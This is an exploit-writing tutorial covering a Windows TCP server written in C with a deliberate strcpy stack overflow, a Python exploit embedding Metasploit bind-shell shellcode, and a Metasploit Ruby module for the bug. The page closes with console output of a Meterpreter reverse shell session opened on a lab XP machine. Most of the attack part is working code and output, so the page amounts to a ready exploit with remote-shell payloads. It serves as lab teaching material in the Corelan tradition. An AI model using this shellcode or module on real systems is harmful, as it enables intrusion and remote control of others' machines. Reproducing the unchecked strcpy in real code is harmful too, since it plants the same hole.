
exploit - write metasploit exploit script


Create Vuln Server

Compile the source code with VC6.0 / Dev C++.

#include <iostream.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

/*
 * Deliberately vulnerable helper: copies str into a 500-byte stack buffer
 * with strcpy(), which performs no bounds check. A message longer than
 * 499 bytes (plus the terminating NUL) overruns buf into the adjacent
 * stack-frame data -- the scripts further down rely on reaching the saved
 * return address -- and this is the bug the whole page is built around.
 * The copied data is never used; the function exists only to do the
 * unsafe copy.
 *
 * The safe form would bound the copy to sizeof(buf) - 1 and NUL-terminate
 * explicitly, or reject over-long input before copying.
 *
 * NOTE(review): strcpy() is declared in <string.h>, which this file does
 * not include; presumably one of the Windows headers pulls it in on the
 * original toolchain.
 */
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}

/*
 * Report a Winsock failure in a modal dialog and tear down Winsock.
 *
 * str: text shown in the dialog; the caption is always "socket Error".
 *
 * WSACleanup() is called unconditionally here, so a caller that calls
 * WSACleanup() again afterwards performs a redundant second cleanup.
 */
void sError(char *str)
{
    const char *caption = "socket Error";
    unsigned int flags = MB_OK;

    MessageBox(NULL, str, caption, flags);
    WSACleanup();
}

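/*
 * Entry point: bring up Winsock, accept exactly one TCP client on port
 * 9000, read a single message (at most sizeof(Message) - 1 bytes) and
 * hand it to pr().
 *
 * Returns SS_OK on success and SS_ERROR if any Winsock call fails.
 *
 * The overflow this page is about lives in pr(), not here, and is left
 * untouched. This version only makes the server itself well-formed:
 *  - the WSAStartup() result is checked before any socket call;
 *  - recv() failure is detected via SOCKET_ERROR + WSAGetLastError()
 *    (recv() never returns WSAECONNRESET itself, so the original test
 *    could never fire), and the loop that retried on every error is gone;
 *  - the received message is NUL-terminated before pr()'s strcpy() reads it;
 *  - the listening and client sockets are closed on every error path, and
 *    WSACleanup() runs once per path (sError() already calls it).
 */
int main(int argc, char **argv)
{
    WORD sockVersion;
    WSADATA wsaData;
    int rVal;
    char Message[5000] = "";
    u_short LocalPort = 9000;       /* server port */
    SOCKADDR_IN sin;
    SOCKET serverSocket;
    SOCKET clientSocket;
    int bytesRecv;

    (void)argc;
    (void)argv;

    /* Request Winsock 1.1; every later call fails if startup does. */
    sockVersion = MAKEWORD(1, 1);
    if (WSAStartup(sockVersion, &wsaData) != 0)
    {
        printf("[-] WSAStartup() failed\n");
        return SS_ERROR;
    }

    serverSocket = socket(AF_INET, SOCK_STREAM, 0);
    if (serverSocket == INVALID_SOCKET)
    {
        sError("Failed socket()");  /* sError() also runs WSACleanup() */
        return SS_ERROR;
    }

    sin.sin_family = AF_INET;       /* address family, not PF_INET */
    sin.sin_port = htons(LocalPort);
    sin.sin_addr.s_addr = INADDR_ANY;

    rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
    if (rVal == SOCKET_ERROR)
    {
        closesocket(serverSocket);
        sError("Failed bind()");
        return SS_ERROR;
    }

    rVal = listen(serverSocket, 10);
    if (rVal == SOCKET_ERROR)
    {
        closesocket(serverSocket);
        sError("Failed listen()");
        return SS_ERROR;
    }

    printf("[+] listening on tcp/9000... \n");

    /* Block until one client connects; the server serves a single client. */
    clientSocket = accept(serverSocket, NULL, NULL);
    if (clientSocket == INVALID_SOCKET)
    {
        closesocket(serverSocket);
        sError("Failed accept()");
        return SS_ERROR;
    }

    /* Leave one byte for the terminator so pr() receives a proper C string. */
    bytesRecv = recv(clientSocket, Message, sizeof(Message) - 1, 0);
    if (bytesRecv == SOCKET_ERROR)
    {
        printf("\nrecv() failed: %d\n", WSAGetLastError());
    }
    else if (bytesRecv == 0)
    {
        printf("\nConnection Closed.\n");
    }
    else
    {
        Message[bytesRecv] = '\0';
        /* Deliberately vulnerable: pr() strcpy()s Message into a 500-byte buffer. */
        pr(Message);
    }

    closesocket(clientSocket);
    closesocket(serverSocket);
    WSACleanup();

    return SS_OK;
}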


Stack Overflow

Now exploit vuln-server.exe through its stack overflow bug.

#!/usr/bin/env python
# -*- coding: utf8 -*-

import socket

# NOTE(review): the listing lost its indentation; the body of the `if` is
# assumed to run through the send() call, with close() executed either way.
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect_ex() returns 0 on success and an errno value on failure instead of
# raising, so a refused connection simply skips the block below.
ret = csock.connect_ex(("127.0.0.1", 9000))

if (ret == 0):
    # 500 filler bytes fill pr()'s 500-byte buf; the 4 bytes after it are
    # the address that replaces the saved return address (little-endian).
    junk = "A" * 500
    eip = "\x7B\x46\x86\x7C"   # 7C86467B

    # bad chars: 00
    # (the copy in pr() is a strcpy(), which stops at the first NUL byte)

    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
    buf =  "\x90" * 20
    buf += "\xba\x09\xb0\x2e\x7e\xdb\xc0\xd9\x74\x24\xf4\x5d\x31"
    buf += "\xc9\xb1\x53\x83\xc5\x04\x31\x55\x0e\x03\x5c\xbe\xcc"
    buf += "\x8b\xa2\x56\x92\x74\x5a\xa7\xf3\xfd\xbf\x96\x33\x99"
    buf += "\xb4\x89\x83\xe9\x98\x25\x6f\xbf\x08\xbd\x1d\x68\x3f"
    buf += "\x76\xab\x4e\x0e\x87\x80\xb3\x11\x0b\xdb\xe7\xf1\x32"
    buf += "\x14\xfa\xf0\x73\x49\xf7\xa0\x2c\x05\xaa\x54\x58\x53"
    buf += "\x77\xdf\x12\x75\xff\x3c\xe2\x74\x2e\x93\x78\x2f\xf0"
    buf += "\x12\xac\x5b\xb9\x0c\xb1\x66\x73\xa7\x01\x1c\x82\x61"
    buf += "\x58\xdd\x29\x4c\x54\x2c\x33\x89\x53\xcf\x46\xe3\xa7"
    buf += "\x72\x51\x30\xd5\xa8\xd4\xa2\x7d\x3a\x4e\x0e\x7f\xef"
    buf += "\x09\xc5\x73\x44\x5d\x81\x97\x5b\xb2\xba\xac\xd0\x35"
    buf += "\x6c\x25\xa2\x11\xa8\x6d\x70\x3b\xe9\xcb\xd7\x44\xe9"
    buf += "\xb3\x88\xe0\x62\x59\xdc\x98\x29\x36\x11\x91\xd1\xc6"
    buf += "\x3d\xa2\xa2\xf4\xe2\x18\x2c\xb5\x6b\x87\xab\xba\x41"
    buf += "\x7f\x23\x45\x6a\x80\x6a\x82\x3e\xd0\x04\x23\x3f\xbb"
    buf += "\xd4\xcc\xea\x56\xdc\x6b\x45\x45\x21\xcb\x35\xc9\x89"
    buf += "\xa4\x5f\xc6\xf6\xd5\x5f\x0c\x9f\x7e\xa2\xaf\x8e\x22"
    buf += "\x2b\x49\xda\xca\x7d\xc1\x72\x29\x5a\xda\xe5\x52\x88"
    buf += "\x72\x81\x1b\xda\x45\xae\x9b\xc8\xe1\x38\x10\x1f\x36"
    buf += "\x59\x27\x0a\x1e\x0e\xb0\xc0\xcf\x7d\x20\xd4\xc5\x15"
    buf += "\xc1\x47\x82\xe5\x8c\x7b\x1d\xb2\xd9\x4a\x54\x56\xf4"
    buf += "\xf5\xce\x44\x05\x63\x28\xcc\xd2\x50\xb7\xcd\x97\xed"
    buf += "\x93\xdd\x61\xed\x9f\x89\x3d\xb8\x49\x67\xf8\x12\x38"
    buf += "\xd1\x52\xc8\x92\xb5\x23\x22\x25\xc3\x2b\x6f\xd3\x2b"
    buf += "\x9d\xc6\xa2\x54\x12\x8f\x22\x2d\x4e\x2f\xcc\xe4\xca"
    buf += "\x51\x3c\x34\xc7\xc6\xe7\xad\xaa\x8a\x17\x18\xe8\xb2"
    buf += "\x9b\xa8\x91\x40\x83\xd9\x94\x0d\x03\x32\xe5\x1e\xe6"
    buf += "\x34\x5a\x1e\x23"
    nops = "\x90" * 1500

    # Total 2359 bytes, well under the 5000 the server reads in one recv().
    payload = junk + eip + buf + nops

    # Python 2 str is a byte string here. send() may transmit fewer bytes
    # than requested; sendall() would guarantee the whole buffer goes out.
    csock.send(payload)

csock.close()


Write MSF exploit script

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit exploit module for the custom TCP server defined above.
# Msf::Exploit::Remote::Tcp provides connect/sock/disconnect and the
# RHOST/RPORT options; Msf::Exploit::Remote::Seh provides
# generate_seh_record, used below to emit the 8-byte jump + address pair.
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

# Module metadata plus the RPORT option (default 9000, the port the server
# hard-codes in LocalPort).
def initialize(info={})
super(update_info(info,
# NOTE(review): 'Vulnable' is a typo for 'Vulnerable'; it is a runtime
# string, so it is left untouched here.
'Name'            =>  'Custom Vulnable Tcp Server Buffer Overflow',
# NOTE(review): the single quotes inside %q{} are part of the string, so the
# description is displayed with literal quotes around it.
'Description'     =>  %q{
'This module exploits a custom windows tcp server'
},
'Author'          =>  [ 'Nixawk' ],
'License'         =>  MSF_LICENSE,
'DefaultOptions'  =>  {
'EXITFUNC'       => 'process',
'AllowWin32SEH'  => true
},
# Space: room for the encoded payload; 496 + 8 + 1400 bytes stays well
# under the 5000 bytes the server reads in a single recv().
# BadChars: 0x00 would stop the strcpy() in pr() early; the page does not
# say why 0xFF is excluded as well.
# StackAdjustment: prepends a stack-pointer adjustment so the decoder stub
# does not overwrite the payload it is decoding.
'Payload'         =>  {
'Space'            => 1400,
'BadChars'         => "\x00\xFF",
'StackAdjustment'  => -3500
},
'Platform'      => 'win',
# Ret is the same address the hand-written Python script places after its
# 500 filler bytes; Offset 496 plus the 4-byte jump half of the SEH record
# appears to land it at the same position.
'Targets'       =>
[
['Windows XP SP3 En', {'Ret' => 0x7C86467B, 'Offset' => 496}]
],

'Privileged'     => false,
'DefaultTarget'  => 0,
'DisclosureDate' => 'June 20 2015'
))

# Older two-argument form of register_options (owning class as 2nd arg).
register_options([Opt::RPORT(9000)], self.class)

end

# Builds the buffer (random filler, SEH-style record, encoded payload), sends
# it once over the TCP connection, then starts the payload handler.
def exploit
# The two lines below look like console output from an earlier, failing
# revision of this module that the author kept as a debugging note.
# [*] Started reverse handler on 192.168.1.108:4444
# [-] Exploit failed: TypeError no implicit conversion of String into Integer
connect

# Random filler bytes; same role as the Python script's junk.
sploit = rand_text(target['Offset'])
sploit << generate_seh_record(target.ret)
# sploit << make_nops(50)
sploit << payload.encoded

sock.put(sploit)

handler
disconnect
end
end


Exploit Vuln Server with MSF

msf exploit(custom_vulnserver) > show options

Module options (exploit/windows/misc/custom_vulnserver):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.1.105    yes       The target address
RPORT  9000             yes       The target port

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh              yes       Exit technique (Accepted: , , seh, thread, process, none)
LHOST     192.168.1.108    yes       The listen address
LPORT     8080             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Windows XP SP3 En

msf exploit(custom_vulnserver) > exploit

[*] Started reverse handler on 192.168.1.108:8080
[*] Sending stage (884270 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.108:8080 -> 192.168.1.105:1557) at 2015-06-22 11:16:47 +0000

meterpreter > sysinfo
Computer        : CORELAN-LAB
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : MSHOME
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >


References

https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/